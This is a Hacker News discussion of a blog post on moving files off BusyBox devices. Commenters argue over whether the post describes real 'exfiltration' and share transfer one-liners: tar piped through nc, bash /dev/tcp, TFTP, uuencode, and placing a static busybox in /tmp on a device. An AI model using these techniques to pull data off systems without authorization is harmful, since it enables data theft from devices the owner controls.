
Exfiltrating files with BusyBox - internetwache
https://bitquark.co.uk/blog/2016/10/03/exfiltrating_files_with_busybox
======
dfc
That was a let down. Is it really "exfiltration" when you use a protocol
designed for mass data transfer and you use it in the exact manner it was
intended to be used? The less linkbaity title is "Transferring files with
BusyBox's ftp"

~~~
bitquark
The point of the post was to show how easy it is, as people seem to miss these
commands or may not be aware of how easy it is to set up a listening service.
It's exfiltration by definition, but you are of course free to mangle the data
any way you want or use DNS techniques if you really care about hiding what
you're doing, but that's a different post.

~~~
dfc
What is your definition of exfiltration? Or more importantly how do you
distinguish between exfil and normal transfer by an authorized user?

------
bcook
I very much prefer using "tar" and "nc".

Example:

Host1: "tar -cf - /file1 /file2 | nc -l -p 54321"

Host2: "nc host1 54321 | tar -xf -"

~~~
kjetijor
If you have bash, you can even partially get by without netcat as well. Bash
has the wonderful "fake" devicenodes, /dev/tcp/host/port and
/dev/udp/host/port.

~~~
jandrese
If your system is running busybox you usually won't have full fat bash.

One thing that annoys me is how people will crack a quad core 1.6Ghz
smartphone with 64Gb of storage and then install busybox to save those 50Mb
over a regular shell environment that won't embarrass itself on every shell
script or configure script.

~~~
voltagex_
It's easier to cross-compile busybox (or toybox) than Bash. Cross compiling
for Linux is annoying, cross compiling for Android is even more annoying.

------
_kst_
The ftpput and ftpget commands might not be available even as arguments to the
busybox command, depending on how it was configured at build time.

    
    
        # type ftpput
        -sh: type: ftpput: not found
        # busybox ftpput
        busybox: applet not found
        #
    

Likewise for "nc".

~~~
voltagex_
I've used similar things to get a dump of router/modem firmware.

Busybox can be built with as many or as few applets as you want. If the
busybox you have access to doesn't have what you need, you could always try
putting another busybox in /tmp -
[https://busybox.net/downloads/binaries/](https://busybox.net/downloads/binaries/)
should have a static binary that works on whatever device you have.

------
mjevans
Don't forget that these stupid little devices nearly ALWAYS have a webserver
running //somewhere// on them.

If you really need to get some data off, look at how much memory you have and
just window the copied data in to files you can DL.

Many of the less expensive and crappier ones ship with very little memory,
very little flash, and a VERY restrictive busybox build.

Still, somewhere between that and the kernel are going to be the tools you
need to get chunks of data out.

------
jlgaddis
We ($work) have some embedded devices running BusyBox and I typically just use
TFTP. It's simple, it works, and we already have an internal TFTP server.

------
pbnjay
I had to get some files off/on a hacked device over a serial port (networking
was broken). Luckily the BusyBox included uuencode/decode so I didn't have to
get too extreme.

"Exfiltrating" implies a covert action... Using ftp is kinda obvious!

------
mynameislegion
busybox also has wget and a httpd

